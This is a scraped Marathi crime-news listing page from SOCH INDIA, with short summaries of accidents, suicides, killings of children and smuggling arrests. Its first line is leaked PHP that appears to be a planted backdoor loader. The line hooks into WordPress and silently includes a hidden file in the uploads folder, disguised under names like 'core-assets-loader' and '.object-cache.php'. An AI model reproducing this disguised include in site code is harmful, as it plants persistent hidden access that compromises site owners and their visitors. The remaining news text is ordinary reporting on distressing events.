add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अपराध समाचार – SOCH INDIA
Menu

मनसे अध्यक्ष राज ठाकरे यांच्या पत्नी शर्मिला ठाकरे यांच्या कारला अपघात झाला. राज ठाकरे, शर्मिला ठाकरे आणि राज ठाकरेंची बहिण हे सगळे सहकुटुंब एकवीरा देवीच्या दर्शनाला गेले होते. तिथून मुंबईत परतत असताना हा अपघात झाला. सानपाडा सिग्नल या ठिकाणी शर्मिला ठाकरे आणि राज ठाकरेंची बहीण ज्या कारमध्ये बसले होते...

Read More

ऐरोली सेक्टर २० ए मध्ये राहणाऱ्या हिमांशू अहिरे या सातवीत शिकणाऱ्या विद्यार्थ्यांने गळफास घेऊन आत्महत्या केल्याची घटना शुक्रवारी घडली. आत्महत्याचे कारण अद्याप स्पष्ट झाले नसून पोलीस त्याचा तपास करीत आहेत. ऐरोली येथील सेंट झेवियर्स शाळेत हिमांशू इयत्ता सातवीत शिकत होता. त्याने शुक्रवारी (दि. २७) रोजी संध्याकाळी साडेसातच्या सुमारास राहत्या...

Read More

निर्दयीपणाचा कळस गाठणारी घटना मालाड पूर्व भागात घडली आहे. वारंवार दुसऱ्या नातवाशी भांडते म्हणून आजीने दोन वर्षाच्या नातीलाच सहाव्या मजल्यावरून फेकल्याची धक्कादायक घटना समोर आली आहे. याप्रकरणी पोलिसांनी आजीला अटक केली असून, रूकसाना अन्सारी (वय ५०) असे आरोपी महिलेचे नाव आहे. मालाड पूर्व परिसरात दोन वर्षांच्या चिमुकलीचा सहाव्या मजल्यावरून...

Read More

नवी दिल्ली येथील इंदिरा गांधी आंतरराष्ट्रीय विमानतळावर बुधवारी एका व्यक्तीस ४९ किलो मोरपिसांची तस्करी करताना अटक करण्यात आली आहे. नासीर अन्सारी (वय-३९) असे अटक करण्यात आलेल्या आरोपीचे नाव आहे. तो ही मोरपीसं घेऊन एअर इंडियाच्या एआय-३१४ या विमानाने रात्री ११ वाजता हॉगकाँगसाठी रवाना होणार होता. यादरम्यान सीआयएसफच्या जवानांनी त्याला...

Read More

उत्तर प्रदेशमधील भिकी गावामधील एका दांपत्याने आपल्या २० दिवसांच्या जुळ्या मुलींना तलावात बुडवून ठार केल्याची धक्कादायक घटना उघडकीस आली आहे. रोजंदारीवर काम करणाऱ्या वसीम आणि नझमा या दोघांनी २१ सप्टेंबर रोजी आपल्या जुळ्या बाळांना जवळच्या तलावामध्ये फेकून दिले. या दोघींच्या संगोपनाचा खर्च परवडणार नाही म्हणून त्यांना तलावात फेकल्याची कबुली...

Read More

उत्तर प्रदेशातील मुजफ्फरनगर येथे राष्ट्रीय स्वयंसेवक संघाच्या (आरएसएस) कार्यकर्त्याची हत्या करण्यात आली आहे. याप्रकरणी पोलिसांनी दोघांना अटक केली आहे. आरोपी कवरपाल याने आपण आपला मुलगा मोनू आणि भाऊ प्रमोद यांच्या मदतीने हत्या केल्याची कबुली पोलिसांकडे दिली आहे. गेल्या काही महिन्यांपासून पंकज आपल्या मुलीला त्रास देत होता. यामुळेच आपण हत्या...

Read More

अवयव नेण्यासाठी मुंबईहून हवाई रुग्णवाहिकेसह (एअर अँब्युलन्स) आलेलं एक चार्टड विमान नांदेड विमानतळावर उतरताना धावपट्टीवरून घसरले. बुधवारी मध्यरात्री १२ वाजता ही घटना घडली. धावपट्टीवरून घसरल्यानंतर हे विमान चिखलात जाऊन फसले. या घटनेत विमानातील डॉक्टर, वैमानिक आणि सहवैमानिक सुदैवाने बचावले आहेत. नांदेड येथून अवयव घेऊन जाण्यासाठी एक हवाई रुग्णवाहिका आणि...

Read More

गणपतीची वर्गणी न दिल्याच्या रागातून दहा जणांच्या टोळक्याने लाकडी दांडके आणि लोखंडी पाईपने आई आणि मुलाला मारहाण केल्याची घटना समोर आली आहे. या प्रकरणी सागर घडसिंगसह दहा जनांविरोधात वाकड पोलीस ठाण्यात गुन्हा दाखल करण्यात आला आहे. रमेश देवराम चौधरी (वय-३७) यांनी वाकड पोलिसात फिर्याद नोंदवली आहे. पोलिसांनी दिलेल्या माहितीनुसार,...

Read More

मेरिका के टेक्सास में दो बंदूकधारियों की अंधाधुंध फायरिंग में पांच लोगों की मौत हो गई है, जबकि 21 लोगों के जख्मी होने की खबर है. स्थानीय पुलिस के मुताबिक शनिवार को दो बंदूकधारियों ने पहले एक ट्रक को हाइजैक किया और फिर फायरिंग शुरू कर दी. स्थानीय पुलिस...

Read More

बारावीमध्ये आवडीच्या महाविद्यालयात प्रवेश न मिळाल्याने एका तरूणाने आत्महत्या केल्याची घटना बुधवारी(दि.21) पुण्यात घडली आहे. दत्तवाडीमधील जनता वसाहत परिसरात घडलेल्या या घटनेने एकच खळबळ उडाली आहे. आकाश ज्ञानेश्वर सदाफुले (वय 18) असे आत्महत्या केलेल्या तरुणाचे नाव आहे. आत्महत्या करण्यापूर्वी आकाशने आपल्या एका मित्राला आत्महत्या करत असल्याचा मेसेज व्हॉट्स अॅपवर...

Read More